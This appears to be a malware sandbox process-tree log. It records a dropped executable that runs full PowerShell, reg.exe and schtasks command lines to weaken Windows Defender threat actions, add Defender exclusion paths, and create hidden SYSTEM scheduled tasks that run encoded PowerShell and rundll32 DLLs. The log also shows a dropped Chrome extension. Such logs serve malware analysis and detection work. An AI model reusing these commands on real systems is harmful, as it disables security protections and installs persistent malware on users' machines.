C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\UxpymuaMygfozov\NbuyrFd.exeC:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\UxpymuaMygfozov\NbuyrFd.exe kl /site_id 385107 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:2180
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4616
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3744
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EqfDIhLUOuAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EqfDIhLUOuAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWqLCKNYOCKLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWqLCKNYOCKLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sDZzDwaoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sDZzDwaoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zFCBYkQYpDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zFCBYkQYpDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\tcytjYddvuQvqLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\tcytjYddvuQvqLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MJuhmGroQWBIVyTj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MJuhmGroQWBIVyTj\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EqfDIhLUOuAU2" /t REG_DWORD /d 0 /reg:323⤵PID:3772
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EqfDIhLUOuAU2" /t REG_DWORD /d 0 /reg:324⤵PID:1148
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EqfDIhLUOuAU2" /t REG_DWORD /d 0 /reg:643⤵PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR" /t REG_DWORD /d 0 /reg:323⤵PID:3356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR" /t REG_DWORD /d 0 /reg:643⤵PID:3912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWqLCKNYOCKLC" /t REG_DWORD /d 0 /reg:323⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWqLCKNYOCKLC" /t REG_DWORD /d 0 /reg:643⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sDZzDwaoU" /t REG_DWORD /d 0 /reg:323⤵PID:4812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sDZzDwaoU" /t REG_DWORD /d 0 /reg:643⤵PID:216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zFCBYkQYpDUn" /t REG_DWORD /d 0 /reg:323⤵PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zFCBYkQYpDUn" /t REG_DWORD /d 0 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\tcytjYddvuQvqLVB /t REG_DWORD /d 0 /reg:323⤵PID:1332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\tcytjYddvuQvqLVB /t REG_DWORD /d 0 /reg:643⤵PID:4576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA /t REG_DWORD /d 0 /reg:323⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA /t REG_DWORD /d 0 /reg:643⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MJuhmGroQWBIVyTj /t REG_DWORD /d 0 /reg:323⤵PID:5068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MJuhmGroQWBIVyTj /t REG_DWORD /d 0 /reg:643⤵PID:392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAYWYWifK" /SC once /ST 18:01:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAYWYWifK"2⤵PID:2132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAYWYWifK"2⤵PID:1532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ckXwTgLLPEtUwbToA" /SC once /ST 09:33:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MJuhmGroQWBIVyTj\cajiNWOIQNwNBJs\OMKHFdR.exe\" At /site_id 385107 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ckXwTgLLPEtUwbToA"2⤵PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4620 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4356
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1288
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3112
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
PID:4984 -
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={13285b6f-aeaa-4c31-ba2d-b62070944a39} --system2⤵
- Executes dropped EXE
PID:1088
-
-
C:\Windows\Temp\MJuhmGroQWBIVyTj\cajiNWOIQNwNBJs\OMKHFdR.exeC:\Windows\Temp\MJuhmGroQWBIVyTj\cajiNWOIQNwNBJs\OMKHFdR.exe At /site_id 385107 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3868 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnNSajhVxJSdGghoLZ"2⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1756
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3080
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:868
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\sDZzDwaoU\jGcLAk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FeYIZJMIrDMHpta" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FeYIZJMIrDMHpta2" /F /xml "C:\Program Files (x86)\sDZzDwaoU\KvAeUNL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FeYIZJMIrDMHpta"2⤵PID:1080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FeYIZJMIrDMHpta"2⤵PID:3860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NXGwaAPLNQhZTI" /F /xml "C:\Program Files (x86)\EqfDIhLUOuAU2\kNeSGxe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BDVfvgxmFKLpI2" /F /xml "C:\ProgramData\tcytjYddvuQvqLVB\jcjOHzb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nVyYSLaLZpeELibNc2" /F /xml "C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\vZGhkIX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SXQGDRXFvEUIaERUonw2" /F /xml "C:\Program Files (x86)\nWqLCKNYOCKLC\tCCGmgb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zCCIxqGdnvUEnSAiG" /SC once /ST 19:23:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MJuhmGroQWBIVyTj\vHnuoCIy\fQZxQcp.dll\",#1 /site_id 385107" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "zCCIxqGdnvUEnSAiG"2⤵PID:4160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pVvXl1" /SC once /ST 15:20:39 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "pVvXl1"2⤵PID:1668
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MJuhmGroQWBIVyTj\vHnuoCIy\fQZxQcp.dll",#1 /site_id 3851071⤵PID:1208
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MJuhmGroQWBIVyTj\vHnuoCIy\fQZxQcp.dll",#1 /site_id 3851072⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4424 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zCCIxqGdnvUEnSAiG"3⤵PID:216
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2648 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffc48ad4f50,0x7ffc48ad4f60,0x7ffc48ad4f702⤵PID:2076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1760 /prefetch:22⤵PID:4280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1816 /prefetch:82⤵PID:2152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:82⤵PID:1436
-
-
